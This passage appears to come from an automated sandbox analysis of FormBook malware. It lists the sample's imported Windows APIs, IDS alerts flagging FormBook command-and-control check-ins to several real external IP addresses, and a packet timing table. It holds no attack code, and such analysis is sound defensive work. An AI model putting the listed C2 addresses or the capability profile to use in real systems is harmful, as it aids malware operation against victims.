KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T17:29:46.279961+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63688 | 65.21.196.90 | 80 | TCP
2024-09-27T17:30:19.046227+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63692 | 3.33.130.190 | 80 | TCP
2024-09-27T17:30:21.408275+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63693 | 3.33.130.190 | 80 | TCP
2024-09-27T17:30:23.081891+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63694 | 3.33.130.190 | 80 | TCP
2024-09-27T17:30:26.054926+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63695 | 3.33.130.190 | 80 | TCP
2024-09-27T17:30:32.493925+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63696 | 38.47.233.19 | 80 | TCP
2024-09-27T17:30:35.077130+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63699 | 38.47.233.19 | 80 | TCP
2024-09-27T17:30:37.596530+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63700 | 38.47.233.19 | 80 | TCP
2024-09-27T17:30:40.119661+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63701 | 38.47.233.19 | 80 | TCP
2024-09-27T17:30:46.412025+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63702 | 172.67.165.25 | 80 | TCP
2024-09-27T17:30:49.024299+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63703 | 172.67.165.25 | 80 | TCP
2024-09-27T17:30:51.502507+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63704 | 172.67.165.25 | 80 | TCP
2024-09-27T17:30:54.071710+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63705 | 172.67.165.25 | 80 | TCP
2024-09-27T17:30:59.952747+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63706 | 208.91.197.27 | 80 | TCP
2024-09-27T17:31:02.507416+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63707 | 208.91.197.27 | 80 | TCP
2024-09-27T17:31:05.060861+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63708 | 208.91.197.27 | 80 | TCP
2024-09-27T17:31:09.486959+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63709 | 208.91.197.27 | 80 | TCP
2024-09-27T17:31:16.579307+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63711 | 162.0.238.43 | 80 | TCP
2024-09-27T17:31:19.255760+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63712 | 162.0.238.43 | 80 | TCP
2024-09-27T17:31:21.684344+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63713 | 162.0.238.43 | 80 | TCP
2024-09-27T17:31:24.344519+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63714 | 162.0.238.43 | 80 | TCP
2024-09-27T17:31:29.887845+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63715 | 3.33.130.190 | 80 | TCP
2024-09-27T17:31:33.455688+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63716 | 3.33.130.190 | 80 | TCP
2024-09-27T17:31:33.455688+0200 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.5 | 63716 | 3.33.130.190 | 80 | TCP
2024-09-27T17:31:35.999476+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63717 | 3.33.130.190 | 80 | TCP
2024-09-27T17:31:37.480561+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63718 | 3.33.130.190 | 80 | TCP
2024-09-27T17:31:44.108829+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63719 | 85.159.66.93 | 80 | TCP
2024-09-27T17:31:46.655732+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63720 | 85.159.66.93 | 80 | TCP
2024-09-27T17:31:49.202624+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63721 | 85.159.66.93 | 80 | TCP
2024-09-27T17:31:50.930043+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63722 | 85.159.66.93 | 80 | TCP
2024-09-27T17:31:57.288710+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63723 | 160.251.148.20 | 80 | TCP
2024-09-27T17:31:59.824590+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63725 | 160.251.148.20 | 80 | TCP
2024-09-27T17:32:02.545176+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63726 | 160.251.148.20 | 80 | TCP
2024-09-27T17:32:04.945053+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63727 | 160.251.148.20 | 80 | TCP
2024-09-27T17:32:10.965892+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63728 | 208.91.197.39 | 80 | TCP
2024-09-27T17:32:13.559112+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63729 | 208.91.197.39 | 80 | TCP
2024-09-27T17:32:16.103969+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63730 | 208.91.197.39 | 80 | TCP
2024-09-27T17:32:19.335928+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63731 | 208.91.197.39 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Sep 27, 2024 17:30:20.064881086 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:20.069824934 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:20.073498011 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:20.085330009 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:20.090691090 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408143044 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408274889 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408416986 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408461094 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408623934 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408726931 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408755064 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408797026 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408876896 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.409111023 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.409398079 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.409456968 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.413928032 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.414402008 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.593074083 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.598141909 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:22.611567974 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:22.616647005 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:22.616832018 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:22.628164053 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:22.633780956 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:22.635179996 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:23.081831932 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:23.081891060 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:24.139954090 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:24.144892931 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:25.158898115 CEST6369580192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:25.594643116 CEST80636953.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:25.594727039 CEST6369580192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:25.602435112 CEST6369580192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:25.607567072 CEST80636953.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:26.054779053 CEST80636953.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:26.054800034 CEST80636953.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:26.054925919 CEST6369580192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:26.057516098 CEST6369580192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:26.062441111 CEST80636953.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:31.579864979 CEST6369680192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:31.584799051 CEST806369638.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:31.584888935 CEST6369680192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:31.596084118 CEST6369680192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:31.600974083 CEST806369638.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:32.493469954 CEST806369638.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:32.493851900 CEST806369638.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:32.493925095 CEST6369680192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:33.108702898 CEST6369680192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:34.129582882 CEST6369980192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:34.134629011 CEST806369938.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:34.134741068 CEST6369980192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:34.146953106 CEST6369980192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:34.152085066 CEST806369938.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:35.076477051 CEST806369938.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:35.077035904 CEST806369938.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:35.077130079 CEST6369980192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:35.655725002 CEST6369980192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:36.674529076 CEST6370080192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:36.679652929 CEST806370038.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:36.679789066 CEST6370080192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:36.690921068 CEST6370080192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:36.695795059 CEST806370038.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:36.696146011 CEST806370038.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:37.596261024 CEST806370038.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:37.596457958 CEST806370038.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:37.596529961 CEST6370080192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:38.202631950 CEST6370080192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:39.221441031 CEST6370180192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:39.228986979 CEST806370138.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:39.229068995 CEST6370180192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:39.235620975 CEST6370180192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:39.240427017 CEST806370138.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:40.119501114 CEST806370138.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:40.119539022 CEST806370138.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:40.119661093 CEST6370180192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:40.122523069 CEST6370180192.168.2.538.47.233.19
                                                                                                                                                                            Sep 27, 2024 17:30:40.127482891 CEST806370138.47.233.19192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:45.412194014 CEST6370280192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:45.417145967 CEST8063702172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:45.419622898 CEST6370280192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:45.432077885 CEST6370280192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:45.436952114 CEST8063702172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:46.411181927 CEST8063702172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:46.411973953 CEST8063702172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:46.412024975 CEST6370280192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:46.936867952 CEST6370280192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:47.957509995 CEST6370380192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:47.962537050 CEST8063703172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:47.969508886 CEST6370380192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:47.977514029 CEST6370380192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:47.982400894 CEST8063703172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:49.024214029 CEST8063703172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:49.024230957 CEST8063703172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:49.024298906 CEST6370380192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:49.484081984 CEST6370380192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:50.503515959 CEST6370480192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:50.508439064 CEST8063704172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:50.508507013 CEST6370480192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:50.525249958 CEST6370480192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:50.530181885 CEST8063704172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:50.530376911 CEST8063704172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:51.501018047 CEST8063704172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:51.502428055 CEST8063704172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:51.502506971 CEST6370480192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:52.030841112 CEST6370480192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:53.056194067 CEST6370580192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:53.061311960 CEST8063705172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:53.061391115 CEST6370580192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:53.073514938 CEST6370580192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:53.078423023 CEST8063705172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:54.069080114 CEST8063705172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:54.069336891 CEST8063705172.67.165.25192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:54.071710110 CEST6370580192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:30:54.074749947 CEST6370580192.168.2.5172.67.165.25
                                                                                                                                                                            Sep 27, 2024 17:31:31.954320908 CEST80637163.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:33.455688000 CEST6371680192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:33.461662054 CEST80637163.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:33.461781979 CEST6371680192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:34.472141027 CEST6371780192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:34.477045059 CEST80637173.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:34.477116108 CEST6371780192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:34.490447998 CEST6371780192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:34.495346069 CEST80637173.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:34.495368958 CEST80637173.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:35.999475956 CEST6371780192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:36.249774933 CEST80637173.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:36.249841928 CEST6371780192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:37.018671036 CEST6371880192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:37.023731947 CEST80637183.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:37.023816109 CEST6371880192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:37.032845974 CEST6371880192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:37.037769079 CEST80637183.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:37.480252981 CEST80637183.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:37.480482101 CEST80637183.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:37.480561018 CEST6371880192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:37.483401060 CEST6371880192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:31:37.488399982 CEST80637183.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:31:42.581866980 CEST6371980192.168.2.585.159.66.93
